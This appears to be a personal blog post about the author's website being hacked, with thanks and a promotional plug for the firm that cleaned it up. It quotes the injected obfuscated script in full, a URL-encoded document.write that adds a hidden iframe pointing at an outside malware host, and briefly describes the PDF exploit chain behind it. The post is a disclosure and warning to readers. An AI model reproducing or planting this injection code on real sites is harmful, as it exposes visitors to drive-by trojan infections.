Quick update. My site was hacked a few days ago and it was just now fixed; which is why I haven’t posted anything in a few days. Big thanks to the guys over at Blue Sail Creative for getting everything resolved within 24 hours! I actually didn’t know my site was hacked until a few days ago. I was at CES and thought I was having problems due to the horrible internet connection there, I wrong. Here is what I was told about the hack which apparently added some crazy code on all of my .php pages:
“There’s something injecting a script at the bottom of your page
unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%72%65%65%6E%6C%70%6C%2E%63%6F%6D%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B”)
when we decoded that, its including an iframe to greenlpl.com/in.php
Apparently the code points to a php script that points to another website, which then tries to load an embedded version of a PDF document. This document contains one of the recent pdf javascript exploits, which result in remote code execution. Taking a look at the pdf, it seems to contain some obfuscated assembly code. Users who use an outdated version of adobe reader are vulnerable, but even the most recent reader has some unpatched vulnerabilities. Foxit reader should be safe, and people who use Firefox with addons such as NoScript or RequestPolicy should also be safe.
The attack is of a Chinese origin.
According to some anti-virus websites (i.e. here) this attack downloads a couple of binary files and then executes them, installing a trojan on the affected system. Guys, have your computers scanned!
If anyone is having any issues with their site or is looking for some great design/development work at an affordable price I recommend contacting Blue Sail Creative directly on twitter.
Thanks guys!
Comments